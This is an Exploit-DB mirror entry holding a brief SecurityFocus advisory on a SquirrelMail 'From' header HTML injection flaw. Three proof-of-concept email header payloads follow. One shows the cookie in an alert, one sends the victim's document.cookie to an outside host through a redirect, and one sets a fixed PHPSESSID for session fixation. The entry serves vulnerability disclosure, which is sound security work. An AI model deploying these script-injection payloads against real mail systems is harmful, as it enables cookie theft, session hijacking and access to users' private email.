exploit-db-mirror/exploits/php/webapps/24167.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

11 lines
No EOL
714 B
Text

source: http://www.securityfocus.com/bid/10450/info
SquirrelMail is reported to be prone to a 'from' field email header HTML injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied email header strings.
An attacker can exploit this issue to gain access to an unsuspecting user's cookie based authentication credentials; disclosure of personal email is possible. Other attacks are also possible.
From:<!--<>(-->John Doe<script>window.alert(document.cookie);</script><>
From:(<!--(--><script>document.location='http://www.rs-labs.com/?'+document.cookie;</script><>
From:<!--<>(-->John Doe<script>document.cookie='PHPSESSID=xxx;path=/';</script><>